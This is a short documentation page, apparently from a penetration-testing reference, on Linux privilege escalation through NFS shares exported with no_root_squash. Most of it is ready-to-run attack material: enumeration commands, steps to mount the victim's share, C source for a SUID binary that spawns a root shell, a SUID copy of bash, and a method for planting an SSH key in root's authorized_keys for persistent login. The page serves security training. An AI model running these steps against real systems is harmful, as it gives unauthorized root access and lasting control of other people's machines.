Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

NFS (Network File System) shares configured with no_root_squash allow remote root users to create files as root on the share. If the share is mounted on the target, any SUID file created will execute as root.

Enumerate NFS Shares

From Target

cat /etc/exports
showmount -e localhost

From Attacker

showmount -e TARGET_IP
nmap -sV -p 111,2049 TARGET_IP
nmap --script nfs* TARGET_IP

Look For

/home/user  *(rw,no_root_squash)
/tmp        *(rw,no_root_squash)
no_root_squash = remote root keeps root privileges on share.

Exploit

Step 1 — Mount Share on Attacker (as root)

mkdir /tmp/nfs
mount -t nfs TARGET_IP:/home/user /tmp/nfs

Step 2 — Create SUID Binary

#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}

gcc shell.c -o /tmp/nfs/shell
chmod +s /tmp/nfs/shell

Step 3 — Execute on Target

/home/user/shell
# root shell

Alternative — Copy SUID bash

cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash
On target: 
/home/user/rootbash -p

Alternative — Write SSH Key

mkdir /tmp/nfs/.ssh
ssh-keygen -t ed25519 -f /tmp/key -N ""
cp /tmp/key.pub /tmp/nfs/.ssh/authorized_keys
chmod 700 /tmp/nfs/.ssh
chmod 600 /tmp/nfs/.ssh/authorized_keys

ssh -i /tmp/key root@TARGET_IP

root_squash vs no_root_squash

SettingBehavior
root_squash (default)Remote root mapped to nfsnobody — cannot create SUID
no_root_squashRemote root stays root — full control
no_all_squashNon-root users keep their UID